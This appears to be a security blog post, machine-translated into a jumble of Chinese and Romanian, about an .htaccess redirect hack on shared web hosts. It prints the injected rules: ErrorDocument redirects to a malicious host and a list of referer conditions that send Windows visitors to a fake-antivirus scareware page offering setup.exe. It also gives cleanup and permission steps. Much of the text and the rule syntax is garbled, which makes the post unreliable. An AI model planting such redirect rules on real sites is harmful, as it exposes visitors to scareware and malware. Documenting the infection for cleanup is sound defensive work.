惡意軟件/病毒 - htaccess的“改寫”重定向

Ønoua經病毒 despre護理VAD CA怒江本身原位foarte multe,afecteaza站點URI hostate PE ,發球nesigure的 UNDE conturile userilor / conturile subdomenii本身鍋“vedea”INTRE元素。 “邁確切的說,主機必須遵守conturile PUSE在folderul toate”虛擬主機“寫作的權利 用戶文件夾 “虛擬主機”在大多數情況下,被賦予了一般用戶...經銷商。 這是一個典型的Web服務器不使用 WHM / cPanel的的.

行動的病毒。htaccess的 - htaccess的哈克。

病毒 影響文件 的。htaccess 網站的犧牲品。 我加線/ 指示訪問者重定向 (來自雅虎,MSN,谷歌,臉譜,yaindex,嘰嘰喳喳,MySpace上,等網站和門戶網站高流量)的一些網站,提供“殺毒“這是 假冒殺毒軟件,這是我在介紹中寫道 .

國際航空運輸協會暨磯未 的。htaccess afectat:(NU accesati網址urile的DIN continutul liniilor德邁喬斯)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine敘述在

的RewriteCond%{HTTP_REFERER} * Yandex的。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Odnoklassniki * $ [NC]
的RewriteCond%{HTTP_REFERER} *的Vkontakte。* $ [NC]
的RewriteCond%{HTTP_REFERER} *藍巴勒* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *管* $ [NC]
的RewriteCond%{HTTP_REFERER} *維基百科。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *博客* $ [NC]
的RewriteCond%{HTTP_REFERER} *百度* $ [NC]
的RewriteCond%{HTTP_REFERER} * Qq.com * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *的Myspace * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * Twitter的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *為必填項。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *谷歌* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *現場。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * AOL * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *冰* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * MSN * $ [NC]
的RewriteCond%{HTTP_REFERER} *亞馬遜。* $ [NC]
*易趣的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * LinkedIn * $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。照片。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * LiveJasmin上。* $ [NC]
的RewriteCond%{HTTP_REFERER} *搜搜。* $ [NC]
的RewriteCond%{HTTP_REFERER} * DoubleClick的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *版權所有。Pornhub * $ [NC]
的RewriteCond%{HTTP_REFERER} * Orkut的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * LiveJournal的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。* WordPress的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *雅虎* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *賣出* $ [NC]
*激發的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * AltaVista的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * MSN * $ [NC]
*網景的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * HOTBOT * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *轉到* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * Infoseek的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。媽媽。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *搜狗。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Lycos的* $ [NC,OR]
*搜索的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * MetaCrawler * $ [NC,OR]
*郵件的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Dogpile網站。* $ [NC]

的RewriteCond%{HTTP_USER_AGENT} * Windows *的。
*重寫規則。 [R,L]

RewriteCond%{REQUEST_FILENAME}!-F
的RewriteCond%{REQUEST_FILENAME}-D!
的RewriteCond%{REQUEST_FILENAME}!* JPG $ | * GIF $ | * PNG $
的RewriteCond%{HTTP_USER_AGENT} * Windows *的。
*重寫規則。 [R,L]

使用WordPress的人會發現這些文件中的行 的。htaccess 您的 為public_html。 此外,病毒會創建一個相同htaccess的文件夾中。 可濕性粉劑內容.

*也有在哪些情況下而不是發生peoriavascularsurgery.com的 dns.thesoulfoodcafe.com 或其他地址。

是什麼讓這個病毒。

一旦重定向,張開雙臂迎接遊客的消息:

警告!
您的電腦包含各種病毒和惡意程序存在的跡象。 您的即時需要防病毒系統檢查!
安全系統將執行一個快速和免費的掃描您的電腦病毒和惡意程序。

1惡意軟件

無論哪個按鈕被按下時,我們採取的頁面“我的電腦“創建模仿 設計XP。 這會自動啟動“掃描”結束時,我們發現“感染”。

2惡意軟件

之後單擊“確定”或“取消”,它將開始 下載文件 SETUP.EXE。 這 setup.exe是假的防病毒 影響系統。 你安裝一些惡意軟件,病毒進一步傳播鏈接,而且除了這些以外一個 防病毒軟件 (全是假的),受害人被邀請來買。
那些誰已經接觸病毒可能使用這種形式 。 它也建議您掃描整個硬盤。 建議 卡巴斯基互聯網安全套裝卡巴斯基反病毒.

這種類型的病毒會影響遊客OS操作系統 Windows 2000的是Windows Me,Windows XP中,Windows NT中,Windows 98的 SI Windows 95的。 帕納本身cunosc prezent NU cazuri infectare強麥sistemelor operare Windows Vista的SI Windows 7的。

射精putem撇銷acest病毒。:htaccess的PE服務器SI暨putem preveni infectarea。

1. Analizarea fisierelor SI stergerea codurilor suspecte。 Pentru一個NE asigura約NU埃斯特afectat numai fisierul 的。htaccess 埃斯特莖SA analizam toate fisierele 。PHP si JS。.

2。 Rescriem fisierul htaccess的SI-I setam庫存 CHMOD 644的744 drepturi scriere numai PE立方米 用戶UL所有者.

3。 CAND SE Atunci creaza未續託管pentru聯合國網站,在folderul /家/ webroot的 本身VA CREA自動聯合國文​​件夾的護理策勒縣邁multe大利是numele的用戶ului。(用戶pentru的cPanel,FTP等)。 Pentru一個preveni的scrierea日期SI transmiterea virusi德拉聯合國用戶la altul的,埃斯特這表CA PE fiecare文件夾的用戶sa本身seteze:

CHMOD 644秀744 755 - indicat ESTE 644。
喬敦-R nume_user nume_folder。
chgrp命令-R nume_user nume_folder

LS-所有 如果他們作出正確的方法來檢查。 應該會出現這樣的事情:

drwx-X-X 12 Dinamics Dinamics五月4096 6 14:51 Dinamics /
drwx-X-X 10杜蘭杜蘭三月4096 7 07:杜蘭46 /
drwx-X-X 12 4096月29 11管管:23管/
drwxr-XR-X 14二月4096日26 2009快遞快遞快遞/
drwxr-XR-X 9 EZO EZO五月4096 19 01:EZO 09 /
drwx-X-X製藥PHARMA 9。12月4096日19 22:製藥29 /

如果上面任何一個是userele FTP 被感染的文件它不能發送病毒到另一個用戶主機。 這是最起碼的安全網,以保護在Web服務器上的託管賬戶。

這種類型的病毒影響的地區的常見元素。

所有受影響地區的訪問者重定向到網站域名中含有“/“。

這種“htaccess文件的病毒。“CMS任何類型的影響(的Joomla,WordPress的,PHPBB等),使用 的。htaccess

htaccess的重定向病毒哈克&.

惡意軟件/病毒 - htaccess的“改寫”重定向

關於作者

隱形LP

創始人和主編 隱身設置在2006日期。
在Linux操作系統上(尤其是CentOS的)的Mac OS X,Windows XP中>的Windows 10和WordPress(CMS)的經驗。

發表評論